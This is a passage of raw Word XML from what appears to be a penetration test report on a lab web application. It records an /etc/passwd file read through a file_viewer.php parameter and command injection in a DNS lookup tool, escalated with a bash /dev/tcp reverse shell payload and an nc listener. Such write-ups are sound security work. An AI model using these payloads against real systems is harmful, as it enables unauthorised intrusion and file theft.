          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Domain Name System</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>lookup tool, an ASCII gallery, a template renderer, a URL fetcher, and a search tool</w:t>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="121" w:name="paragraph67"/>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource67"</w:instrText>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Figure A.48</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>(see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349FEE90" w14:textId="1D483EB5" w:rsidR="007D5A37" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc223521129"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5A37" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Arbitrary File Read via Unsanitized File Parameter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="2A96D24B" w14:textId="2DCCEB23" w:rsidR="002D02DC" w:rsidRPr="00D77DFE" w:rsidRDefault="00367D87" w:rsidP="00AD6E34">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecting the File Viewer option redirected the user to </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file_viewer.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, a component that retrieves and displays server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>side files. Article items were served through the parameter:</w:t>
      </w:r>
      <w:r w:rsidR="00887806" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file=articles/article1.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="123" w:name="paragraph68"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource68"</w:instrText>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C047BB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.49</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81AE42" w14:textId="543D07E7" w:rsidR="00367D87" w:rsidRPr="00D77DFE" w:rsidRDefault="00367D87" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Inspection of the request structure suggested the possibility of improper input validation and insufficient path restriction. To validate this, the file parameter was manipulated by replacing the expected article path with an absolute system file:</w:t>
      </w:r>
      <w:r w:rsidR="00887806" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file=/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="124" w:name="paragraph69"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource69"</w:instrText>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.50</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3BDE82" w14:textId="740DBD3A" w:rsidR="007D5A37" w:rsidRPr="00D77DFE" w:rsidRDefault="00367D87" w:rsidP="009C6B75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The server returned the full contents of /etc/passwd, confirming an arbitrary file read vulnerability. This flaw indicates that the application fails to sanitize user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>controlled input and does not enforce directory traversal protection, enabling disclosure of sensitive system files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF69CB5" w14:textId="0FDA90D2" w:rsidR="007D5A37" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc223521130"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D5A37" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS Lookup </w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tool:</w:t>
      </w:r>
      <w:r w:rsidR="007D5A37" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command Injection Leading to Remote Shell Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="11575C64" w14:textId="1FDA1328" w:rsidR="00AE369A" w:rsidRPr="009C6B75" w:rsidRDefault="00AE369A" w:rsidP="009C6B75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The DNS Lookup tool executes nslookup on user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">supplied input. While normal queries behaved as expected, injecting shell metacharacters such </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>as ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> pwd caused unintended command execution, confirming a command injection flaw</w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="126" w:name="paragraph71"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource71"</w:instrText>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A.52</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:r w:rsidR="00020D71"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w:t>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This weakness was escalated to remote code execution using the payload:</w:t>
      </w:r>
      <w:r w:rsidR="009C6B75">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www.google.com; bash -c 'bash -i &gt;&amp; /dev/tcp/10.0.1.158/4455 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353530D6" w14:textId="5B27244C" w:rsidR="009D2113" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="009C6B75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A listener was started with nc -nvlp 4455, and upon submitting the payload, the server initiated a reverse shell connection</w:t>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="127" w:name="paragraph70"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource70"</w:instrText>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.51</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
      <w:r w:rsidR="00020D71" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. The tester obtained an interactive session as www-data on 10.0.3.190, demonstrating full system access via the vulnerable DNS Lookup component</w:t>
      </w:r>
      <w:r w:rsidR="00047D2A" w:rsidRPr="00D77DFE">
        <w:rPr>
